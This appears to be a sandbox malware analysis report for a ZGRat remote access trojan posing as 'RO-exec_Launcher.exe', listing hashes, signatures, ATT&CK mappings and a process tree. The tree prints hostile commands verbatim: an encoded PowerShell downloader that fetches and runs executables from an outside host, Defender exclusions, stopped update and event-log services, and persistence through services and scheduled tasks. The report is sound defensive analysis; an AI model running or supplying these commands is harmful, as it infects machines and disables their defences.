zgrat | b1b4c0259825fa79fe6176502cd6900ec7411687981f8e5d9738edbd83fd9dca

Analysis

max time kernel
9s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
17/04/2024, 23:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RO-exec_Launcher.exe
Size

2.3MB
MD5

ee091b0aff43b9506fbc384642f44275
SHA1

1f0328c27b1dcbc3bc726ab5a2fa7cafc89c0ac5
SHA256

b1b4c0259825fa79fe6176502cd6900ec7411687981f8e5d9738edbd83fd9dca
SHA512

06ca311ea0db212ffeb834bd703a5e545ff69e196f7973f108248361f253d91342b431fa895b516bf54fd15c91eebcd2a4a4132560bfd2ec05310cd8217c2e00
SSDEEP

49152:uIYdMYohOojDmYf2r3klp0S++a3t99BDwlrFevdd39BRIbD8M:u2POo72b1SBw9crF6n3ZI

Score

10^/10

zgrat evasion persistence rat

Malware Config

Signatures

Detect ZGRat V1 8 IoCs

resource	yara_rule
behavioral1/files/0x000a0000000233bf-95.dat	family_zgrat_v1
behavioral1/files/0x000a0000000233bf-104.dat	family_zgrat_v1
behavioral1/files/0x000a0000000233bf-105.dat	family_zgrat_v1
behavioral1/memory/4516-106-0x0000000000A50000-0x0000000000C54000-memory.dmp	family_zgrat_v1
behavioral1/files/0x00070000000233d1-331.dat	family_zgrat_v1
behavioral1/files/0x00070000000233d1-330.dat	family_zgrat_v1
behavioral1/files/0x00070000000233d1-373.dat	family_zgrat_v1
behavioral1/files/0x00070000000233d1-419.dat	family_zgrat_v1

Process spawned unexpected child process 15 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	732	3908	schtasks.exe	99
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1764	3908	schtasks.exe	99
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	824	3908	schtasks.exe	99
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4860	3908	schtasks.exe	99
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1116	3908	schtasks.exe	99
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3976	3908	schtasks.exe	99
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4308	3908	schtasks.exe	99
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2844	3908	schtasks.exe	99
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3524	3908	schtasks.exe	99
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2756	3908	schtasks.exe	99
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3448	3908	schtasks.exe	99
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4932	3908	schtasks.exe	99
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4460	3908	schtasks.exe	99
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4364	3908	schtasks.exe	99
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3432	3908	schtasks.exe	99

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-553605503-2331009851-2137262461-1000\Control Panel\International\Geo\Nation	RO-exec_Launcher.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
1892	RO-exec_Launcher.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3032	sc.exe
4040	sc.exe
180	sc.exe
1788	sc.exe
1552	sc.exe
1944	sc.exe
3580	sc.exe
3520	sc.exe
2000	sc.exe
3008	sc.exe
2344	sc.exe
5036	sc.exe
1912	sc.exe
400	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4364	schtasks.exe
1116	schtasks.exe
3976	schtasks.exe
2844	schtasks.exe
4932	schtasks.exe
4460	schtasks.exe
2756	schtasks.exe
3432	schtasks.exe
1764	schtasks.exe
824	schtasks.exe
4860	schtasks.exe
3524	schtasks.exe
3448	schtasks.exe
732	schtasks.exe
4308	schtasks.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
4864	PING.EXE
512	PING.EXE
868	PING.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3232	powershell.exe
3232	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3232	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1892	RO-exec_Launcher.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1892 wrote to memory of 3232	1892	RO-exec_Launcher.exe	87
PID 1892 wrote to memory of 3232	1892	RO-exec_Launcher.exe	87
PID 1892 wrote to memory of 3232	1892	RO-exec_Launcher.exe	87

C:\Users\Admin\AppData\Local\Temp\RO-exec_Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\RO-exec_Launcher.exe"
1⤵
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1892
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAeABqACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABxAG0AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcABpAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBzAGwAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBOAGUAegB1AHIALgBlAHgAZQAnACwAIAA8ACMAYQB4AG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBxAHIAawAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBnAHkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBOAGUAegB1AHIALgBlAHgAZQAnACkAKQA8ACMAYwB6AHcAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAHIAZQBtAG8AdABlAC8AcgBiAEgAeQBwAGUAcgBzAHUAcgByAG8AZwBhAHQAZQBzAGEAdgBlAHMARABoAGMAcAAuAGUAeABlACcALAAgADwAIwB4AHAAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAbABoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGgAcABrACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHIAYgBIAHkAcABlAHIAcwB1AHIAcgBvAGcAYQB0AGUAcwBhAHYAZQBzAEQAaABjAHAALgBlAHgAZQAnACkAKQA8ACMAZQBwAHMAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAG0ALwBjAG8AbgBoAG8AcwB0AHMAeQBuAC4AZQB4AGUAJwAsACAAPAAjAGcAbgBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQBnAHEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZQBxAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABzAHkAbgAuAGUAeABlACcAKQApADwAIwBxAHkAdAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGUAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbgBzAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATgBlAHoAdQByAC4AZQB4AGUAJwApADwAIwB6AHgAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBzAHMAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZgB6AGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcgBiAEgAeQBwAGUAcgBzAHUAcgByAG8AZwBhAHQAZQBzAGEAdgBlAHMARABoAGMAcAAuAGUAeABlACcAKQA8ACMAaABsAGEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBkAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHQAeABlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGMAbwBuAGgAbwBzAHQAcwB5AG4ALgBlAHgAZQAnACkAPAAjAGMAegBpACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3232
- - C:\Users\Admin\AppData\Roaming\Nezur.exe
    "C:\Users\Admin\AppData\Roaming\Nezur.exe"
    3⤵
    PID:3012
- - C:\Users\Admin\AppData\Roaming\rbHypersurrogatesavesDhcp.exe
    "C:\Users\Admin\AppData\Roaming\rbHypersurrogatesavesDhcp.exe"
    3⤵
    PID:4684
  - - C:\Users\Admin\AppData\Roaming\.rbHypersurrogatesavesDhcp.exe
      "C:\Users\Admin\AppData\Roaming\.rbHypersurrogatesavesDhcp.exe"
      4⤵
      PID:4516
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\RuntimeBroker.exe'
        5⤵
        
        PID:1332
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Photo Viewer\fr-FR\dllhost.exe'
        5⤵
        
        PID:3924
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\GroupPolicyUsers\fontdrvhost.exe'
        5⤵
        
        PID:1476
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Videos\OfficeClickToRun.exe'
        5⤵
        
        PID:3488
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\unsecapp.exe'
        5⤵
        
        PID:1444
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ySFzI8Y5Xy.bat"
        5⤵
        
        PID:5008
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:1864
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        Runs ping.exe
        
        PID:4864
      - C:\Users\Public\Videos\OfficeClickToRun.exe
        
        "C:\Users\Public\Videos\OfficeClickToRun.exe"
        6⤵
        
        PID:1596
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\J25HRAKNbZ.bat"
        7⤵
        
        PID:4308
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:2932
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        Runs ping.exe
        
        PID:512
        
        C:\Users\Public\Videos\OfficeClickToRun.exe
        
        "C:\Users\Public\Videos\OfficeClickToRun.exe"
        8⤵
        
        PID:404
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\R7RZQa1C6t.bat"
        9⤵
        
        PID:4584
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:3728
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        10⤵
        Runs ping.exe
        
        PID:868
        
        C:\Users\Public\Videos\OfficeClickToRun.exe
        
        "C:\Users\Public\Videos\OfficeClickToRun.exe"
        10⤵
        
        PID:2196
- - C:\Users\Admin\AppData\Roaming\conhostsyn.exe
    "C:\Users\Admin\AppData\Roaming\conhostsyn.exe"
    3⤵
    PID:2812
  - - C:\Users\Admin\AppData\Roaming\.conhostsyn.exe
      "C:\Users\Admin\AppData\Roaming\.conhostsyn.exe"
      4⤵
      PID:3800
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        5⤵
        
        PID:3856
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:1548
      - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:3376
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:5036
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:3008
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:3032
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        5⤵
        Launches sc.exe
        
        PID:4040
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        5⤵
        Launches sc.exe
        
        PID:1788
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        5⤵
        
        PID:1584
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        5⤵
        
        PID:3700
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        5⤵
        
        PID:3212
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        5⤵
        
        PID:2504
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "driverupdate"
        5⤵
        Launches sc.exe
        
        PID:1552
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
        5⤵
        Launches sc.exe
        
        PID:1944
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        5⤵
        Launches sc.exe
        
        PID:3580
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "driverupdate"
        5⤵
        Launches sc.exe
        
        PID:1912

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:732

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1764

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Photo Viewer\fr-FR\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2756

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\fr-FR\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4308

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Photo Viewer\fr-FR\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:824

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Windows\System32\GroupPolicyUsers\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3976

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\GroupPolicyUsers\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4860

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Windows\System32\GroupPolicyUsers\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1116

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Videos\OfficeClickToRun.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3524

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\Public\Videos\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2844

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Videos\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4364

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\unsecapp.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4460

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\Default User\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3448

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4932

C:\ProgramData\VC_redist.x64.exe
C:\ProgramData\VC_redist.x64.exe
1⤵
PID:824
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  PID:2108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:4460
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:1080
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:400
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:2000
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:180
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2344
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:3520
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  PID:4204
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  PID:2008
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  PID:936
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  PID:2640
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:1140

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\VC_redist.x64.exe

Filesize
45.1MB

MD5
681aad3a2808b3195713f084e76f6e6b

SHA1
93289db201f665aa516a1651bccced90d8b480ac

SHA256
9f4a60a8ef151eddc2d5d6491874cb0c455013aeade8cc7f6b4dc517542dc4e4

SHA512
8e40cb6fc1ed596b8637ea81b597c280cf440dd2c7c02a1b20d861ac431528f3a4bc0564a4e1394b68e50a93eca1bf5113f7e508e93be28a429ed075a24f6f95

Download Submit
C:\ProgramData\VC_redist.x64.exe

Filesize
45.1MB

MD5
1a7a5eb92528a412bc7d7200d56320c6

SHA1
cb8a7f6c890827b7d7d98d3bb9c8c251fc21374c

SHA256
2b39ccece7956f264c4c69956a6d7bafcf7e8f8b4da6d99b03738ef57f3d0526

SHA512
c2e94bada6d70b1fb667f48f27868de7f9c56600977515ddbf1712db3a252612773c8f0983aab42ec8ef4efddbd30e24cf99846483826c0b6e6e201d56f14cea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\OfficeClickToRun.exe.log

Filesize
1KB

MD5
935ecb30a8e13f625a9a89e3b0fcbf8f

SHA1
41cb046b7b5f89955fd53949efad8e9f3971d731

SHA256
2a7b829afe6a140bb37d24cc7711749c20cdaaf9cc7c4a182ff081180b4d99e9

SHA512
1210281612b0101ce63555a1a7855589ff68e1eac5b8a2461e10808c5b92c5dd111be72406c2923a94e10b687ceda43dc24d8c22a49dab40a4af793ee6b740aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
2f40704b28fb1f1934ff2f56f06e3c14

SHA1
83a5d3d94e5e36e9f9e5ea2d0526bbf98bde4304

SHA256
aa751ff3ed36fd93f1fef0c8ddd13cf69a213b02d0f3ecfd592f85101a771c5d

SHA512
13d1593cdfdd6b6d6d1e3165462d6965f06616aef62e48150d3145fc02ecf81b6a459fcacbf1fb72882a706814d1d6a55dabe7e6de4aed626048e2e48c3b90f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
a7ce8cefc3f798abe5abd683d0ef26dd

SHA1
b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e

SHA256
5e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a

SHA512
c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
217d9191dfd67252cef23229676c9eda

SHA1
80d940b01c28e3933b9d68b3e567adc2bac1289f

SHA256
e64811c3e57476bb644539824034cabe2cabcb88941122193e2af328f5eb2133

SHA512
86767aa3c0eec425b7c6dbfd70a4a334fb5b1227c05fb06fbb3845e7b6974008386276f441c8e66e2bf9b0ae0a76133c4e5602211788cd702eaeadd12c5ff757

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
ca885ce2b7a4be34acd565a65ea19984

SHA1
8c5d9a4507aab2ef743cd08cee8d0dff7a43bb99

SHA256
c22434ffab6b0df6d60e3f56e0f87e550abd72566622de3d7458ba027ed7378c

SHA512
1cba207f47a009cbc0fdf2a6cf13ef8215e7b28c7d0912006238db9c91dc23c0528e3ba87e02bddc6c7588b346954d4f9bbf426d80159d163318a8b63cc5cebe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
3c7ede87e259562b06b633aafd180164

SHA1
b292673ea6d8439b360a8558c3fbca3957db3b2e

SHA256
cf0241f1a68cd89ea2098a638d262ccd1d347b033a63371325dbf82e2c74dcde

SHA512
5c841e366fc16d53c7ef12fff2d007fe1bae3a8e0a6a2a44f2ea192281c132e57e34c4319a7c3cafada1c28e8117b0a3a55ac385be7d8e252d23cf0a7fb60065

Download Submit
C:\Users\Admin\AppData\Local\Temp\J25HRAKNbZ.bat

Filesize
171B

MD5
c849252ee187871789bef193d4508ddb

SHA1
9a102f083c1de4eb70e47822266a56f6be09d45f

SHA256
3295eab852048d4551f375a38a935463e6334a12a57f6d4c8c6da9a4e2e73b5b

SHA512
49c399bfca2069d2ee83543c85d4d328f321aee6c1e5c2ad9043456435fafa570e607878cd3e2ecab4ce92d66b39f93c08828c95daf14b84d7d40f834d6a4627

Download Submit
C:\Users\Admin\AppData\Local\Temp\R7RZQa1C6t.bat

Filesize
171B

MD5
f8923848b575846a8b81be6c6f48e041

SHA1
a71966a0530175a3280acca594d69e1a61dea71d

SHA256
e216a79c755df8646b4cbe47aa522c1cb8604a9710b13f94c7ab131943832f67

SHA512
1a4ae5055e7fb0dd95aff6413e81dd2fec911d6795ce459231135959748a7b5a76637968eff97800ba7dcf46ba61521de83ae83734ffd4ec9333b73d90f95e1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ecs1bj14.2ha.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

